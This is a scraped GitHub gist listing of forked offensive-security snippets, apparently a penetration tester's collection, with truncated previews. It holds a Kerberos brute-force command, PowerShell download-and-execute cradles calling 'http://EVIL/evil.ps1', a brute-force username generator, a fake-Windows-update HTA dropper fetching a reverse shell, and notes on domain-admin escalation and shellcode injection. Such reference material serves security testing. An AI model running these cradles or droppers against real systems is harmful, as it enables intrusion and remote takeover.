With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
An00byss an00byss
an00byss
/ kerberos_attacks_cheatsheet.md
Created
August 31, 2020 14:45
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### IE Cradle | |
| iex (iwr 'https://raw.githubusercontent.com/BradyDonovan/PSCalcPayload/master/script.ps1' -UseBasicParsing) | |
| ### normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| ### PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| ### hidden IE com object |
an00byss
/ awscli-cheatsheet.md
Created
April 16, 2021 20:52
— forked from davidmoremad/awscli-cheatsheet.md
The AWS CLI Cheatsheet
an00byss
/ namemash.py
Created
February 4, 2022 21:37
— forked from superkojiman/namemash.py
Creating a user name list for brute force attacks.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import sys | |
| import os.path | |
| if __name__ == "__main__": | |
| if len(sys.argv) != 2: | |
| print("usage: {} names.txt".format((sys.argv[0]))) | |
| sys.exit(0) | |
| if not os.path.exists(sys.argv[1]): |
an00byss
/ Pwn2Own2021MSExchangeExploit.py
Created
January 27, 2023 19:47
— forked from rskvp93/Pwn2Own2021MSExchangeExploit.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import base64 | |
| import re | |
| import xml.dom.minidom | |
| import json | |
| import uuid | |
| import struct | |
| import string | |
| import random | |
| import hashlib | |
| import time |
an00byss
/ Update.hta
Created
January 30, 2023 18:16
— forked from r00t-3xp10it/Update.hta
meterpeter v2.10.10 - payload HTA dropper
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- | |
| Hta_Version: 1.0.1 | |
| Author: @r00t-3xp10it (ssa) | |
| Application: meterpeter v2.10.10 dropper | |
| .DESCRIPTION | |
| This HTA changes PS 'ExecutionPolicy' to 'UnRestricted', presents a msgbox | |
| pretending to be a security KB5005101 21H1 update, while downloads\executes | |
| meterpeter client.ps1 (rev_tcp_shell) in background from attacker werbserver. |
an00byss
/ oauthServer.go
Created
December 2, 2023 00:58
— forked from invokethreatguy/oauthServer.go
A mini OAuth server for Azure
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "crypto/tls" | |
| "fmt" | |
| "io/ioutil" | |
| "net/http" | |
| "net/url" | |
| "strings" | |
| ) |
an00byss
/ LICENSE
Created
January 18, 2024 17:42
— forked from brianbruggeman/LICENSE
Convert Viscosity to Open VPN
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Public Domain |
an00byss
/ certifried_with_krbrelayup.md
Created
May 10, 2024 15:30
— forked from S3cur3Th1sSh1t/certifried_with_krbrelayup.md
Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts
Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.
The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.
Prerequisites:
an00byss
/ pwshellcode.py
Created
November 19, 2024 04:33
— forked from mcorybillington/pwshellcode.py
Simple script to tie together TrustedSec's work on running shellcode via powershell with MSFVenvom. Very little effort made to evade/hide/bypass anything, just a simple way to run shellcode in memory if you get command execution and can run PowerShell on a pentest. Stick to x86 payloads from MSFVenom.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Credits to the following projects for a lot of this powershell code and just general inspiration | |
| ## https://github.com/chvancooten/OSEP-Code-Snippets | |
| ## https://www.trustedsec.com/blog/native-powershell-x86-shellcode-injection-on-64-bit-platforms/ | |
| from argparse import ArgumentParser | |
| import subprocess | |
| import base64 | |
| import os |
OlderNewer